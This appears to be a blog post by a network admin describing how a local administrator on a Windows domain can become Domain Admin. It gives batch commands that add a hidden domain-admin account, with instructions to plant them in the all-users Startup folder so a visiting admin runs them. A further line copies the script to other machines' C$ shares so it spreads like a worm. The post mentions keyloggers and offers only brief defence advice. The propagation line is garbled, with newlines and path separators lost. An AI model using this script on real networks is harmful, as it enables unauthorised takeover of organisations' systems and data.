I could have easily called this article “How to hack and take control of an entire Windows Network” but that would draw a lot of negative attention, and it probably should. Let’s start off with a little background on the terminology for those who don’t know that much about Window’s methods of networking. (You can skip to the next section otherwise) A “Domain Admins” is is the security group for users who have administrator rights on every machine that is a member of the domain. A domain is like a workgroup of computers that are under control of the local Active Directory Server. If you’re not in the domain you don’t have access to much. We’re going to change that, by gaining this level of access. There are two basic types of users. Administrators, and Users. Users aren’t allowed to do very much, can’t install software, change things, etc. Whereas Administrators have total control. Local administrators have control of that one computer only. Domain Administrators have control over all pc’s that are part of the domain. In particular they have access to the root share, C$ the default share on every windows professional based pc. If you can become Domain admin, you can access every file on every computer through this share! Now many legacy applications will fail to run as a simple user, so it’s common practice to make a “User” a “Local Admin” of a computer. That means that user has access to add printers, add/remove software of their own pc. This was the pc is still managed, but the user has more freedom to blow up their computer doing awesome stunts like deleting c:/windows/system32 to save space. “But I don’t use that so I thought it was ok to delete…” If you can grasp all that, I’ll go ahead into the description of the “How” you elevate from “Local Admin” to “Domain Admin”
How to a turn my local admin into a Domain admin?
Ok, this is where I’m going to scare you a bit. It’s easy, you don’t need any tools, or the advanced knowledge of expert know how. You only need to type these two lines into a batch file!
net user /domain /add dirtyhackor mysecretpass
net group /domain "Domain Admins" /add dirtyhackor
The first line creates a new user on the domain name dirtyhackor and the second line add that user to the Domain Admins Group. The masters of Windows domains maybe laughing right now, because they know this script won’t fly as it. Because the users don’t have access to create users, and they will only get an error, and Mr. Admin you are to sly to run a batch script without reading it first right? Well how about these apples, place the script in the all users folder under Programs in the “Startup Folder” on this computer. Now when the domain admin walks by to fix your computer, when they log in they will unknowingly run this script and voila! Now you have a secretly created user called “dirtyhackor” on the domain with full access to everything!
But how to get a domain admin to access your computer? A little sabotage can usually get a member of the domain to sign into your(target) computer. Many users are also members of multiple computers as well. What if you wanted to get you’re newly found batch script on to all of the computer’s you are a local admin? Just one more line of batch will let us easily spread the script to other computers over the network!
net user /domain /add dirtyhackor mysecretpassnet group /domain "Domain Admins" /add dirtyhackorfor /F %%i in ('net view') do copy /Y %0 "%%ic$documents and settingsall usersstart menuprogramsstartup"
As you can see, the two lines above are the same as in the previous example, but the third line will scan for all pc’s on the local network, and for the ones that you have local admin rights to, will copy this script to each computer you have access to! So let’s say three people work at the one workstation. Sam logs in, and this spreads to all computers he has access to. Then Sally logs in and it spreads to all of her workstations, Followed by Steve. If they all have access to 3 computers each, that’s 7 computers with the script on it now. Then if anyone uses their computers…. the pattern of spreading continues throughout the network! Eventually a domain admin will run the script and you’re in!
What can you do with this power? Install software on any pc, remotely, keyloggers,send spam, webservers, game servers, backup storage, anything you would want to. SO if you’re a network admin (Like me) You’re probably really thinking about all the times you’ve logged in to a workstation! So what can you do against this threat? Well being aware of this type of trickery is a start, and secondly, make sure you assign domain admin to as few people as possible.
Spread the word! E-mail this to someone who you know needs to be aware of this, and please stumble or dig this, as that will really help get the word out! Thanks for reading!!! +Green